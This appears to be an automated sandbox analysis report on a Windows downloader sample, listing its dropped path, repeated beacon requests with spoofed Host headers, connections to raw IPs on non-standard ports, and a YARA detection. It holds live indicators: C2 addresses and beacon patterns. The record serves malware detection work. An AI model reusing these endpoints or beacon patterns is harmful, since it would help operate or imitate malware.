Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Data Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Data Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Data Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Data Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Data Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Data Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /5N5Gv78Z7d?s=194 HTTP/1.1 Host: google.kz
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /5N5Gv78Z7d?s=194 HTTP/1.1 Host: google.kz Connection: Keep-Alive
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	HTTP traffic: GET /5N5Gv78Z7d?s=194 HTTP/1.1 Host: google.kz Connection: Keep-Alive

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 8001
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 9090
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 8001
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 9090

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1

Yara detected Generic Downloader

Source: Yara match	File source: tDLozbx48F.exe, type: SAMPLE
Source: Yara match	File source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe, type: DROPPED

Source: global traffic	TCP traffic: 192.168.2.16:49737 -> 140.238.218.94:8080
Source: global traffic	TCP traffic: 192.168.2.16:49769 -> 46.235.26.83:8080
Source: global traffic	TCP traffic: 192.168.2.16:49771 -> 168.119.121.16:8080
Source: global traffic	TCP traffic: 192.168.2.16:49774 -> 51.77.125.62:8080
Source: global traffic	TCP traffic: 192.168.2.16:49779 -> 185.189.159.121:8001
Source: global traffic	TCP traffic: 192.168.2.16:49780 -> 65.21.49.163:8080
Source: global traffic	TCP traffic: 192.168.2.16:49781 -> 167.86.115.218:9090
Source: global traffic	TCP traffic: 192.168.2.16:49786 -> 46.226.106.173:8080

Source: global traffic	HTTP traffic detected: GET /f10RkK61wN?197=0 HTTP/1.1Host: twitter.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /blog?223=0 HTTP/1.1Host: cyble.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /f10RkK61wN?197=0 HTTP/1.1Host: x.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /blog/?223=0 HTTP/1.1Host: cyble.com
Source: global traffic	HTTP traffic detected: GET /fheJKe6dsz?s=164 HTTP/1.1Host: twitter.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /0My2dPrz2a?s=27 HTTP/1.1Host: twitter.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /oQJb3GUymA?s=13 HTTP/1.1Host: cybereason.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /oQJb3GUymA?s=13 HTTP/1.1Host: cybereason.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /G4XvFNPg1L?27=1 HTTP/1.1Host: youtube.kzContent-Length: 27Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /G4XvFNPg1L?27=1 HTTP/1.1Host: youtube.kzContent-Length: 27Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /de2GhgMoGn?s=144 HTTP/1.1Host: cybereason.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /de2GhgMoGn?s=144 HTTP/1.1Host: cybereason.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /0My2dPrz2a?s=27 HTTP/1.1Host: twitter.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /36XAhAh7YD?144=1 HTTP/1.1Host: blog.cyble.comContent-Length: 144Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /hKO8byy4cV?118=0 HTTP/1.1Host: cyware.comContent-Length: 118Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzData Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzData Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: POST /hKO8byy4cV?118=0 HTTP/1.1Host: cyware.comContent-Length: 118Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /oQJb3GUymA?s=13 HTTP/1.1Host: cybereason.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /oQJb3GUymA?s=13 HTTP/1.1Host: cybereason.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /G4XvFNPg1L?27=1 HTTP/1.1Host: youtube.kzContent-Length: 27Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /G4XvFNPg1L?27=1 HTTP/1.1Host: youtube.kzContent-Length: 27Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /M82hfWR7nN?s=118 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /de2GhgMoGn?s=144 HTTP/1.1Host: cybereason.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /de2GhgMoGn?s=144 HTTP/1.1Host: cybereason.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /0My2dPrz2a?s=27 HTTP/1.1Host: twitter.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /de2GhgMoGn?s=144 HTTP/1.1Host: cybereason.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzData Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Source: global traffic	HTTP traffic detected: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
